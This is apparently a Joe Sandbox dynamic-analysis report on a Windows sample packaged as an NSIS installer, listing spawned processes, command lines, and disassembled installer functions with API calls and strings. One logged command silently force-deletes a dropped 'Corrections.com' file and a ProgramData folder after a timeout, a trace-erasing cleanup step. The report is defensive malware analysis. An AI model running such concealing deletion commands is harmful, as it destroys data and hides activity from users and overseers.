Show Windows behavior

Target ID:	17
Start time:	14:47:41
Start date:	15/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:48:52
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:48:52
Start date:	15/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:48:52
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x6f0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	27

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

~nsu.tmp, xrefs: 00403B23
/D=, xrefs: 004039D2
NSIS Error, xrefs: 0040390E
_?=, xrefs: 00403A90
\Temp, xrefs: 00403A47
SeShutdownPrivilege, xrefs: 00403C42
NCRC, xrefs: 004039A8
Error launching installer, xrefs: 00403AA9

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename on reboot: %s, xrefs: 00401943
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Rename failed: %s, xrefs: 0040194B
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
detailprint: %s, xrefs: 00401679
SetFileAttributes failed., xrefs: 004017A1
Rename: %s, xrefs: 004018F8
Call: %d, xrefs: 0040165A
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
BringToFront, xrefs: 004016BD
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

_Nb, xrefs: 00405AFD
"F, xrefs: 00405A4B
RichEd32, xrefs: 00405BD4
RichEd20, xrefs: 00405BC9
.exe, xrefs: 00405A69
@jG, xrefs: 00405AF2
.DEFAULT\Control Panel\International, xrefs: 004059C5
RichEdit, xrefs: 00405BF0
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
F, xrefs: 00405A22
RichEdit20A, xrefs: 00405BE2, 00405BE7

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
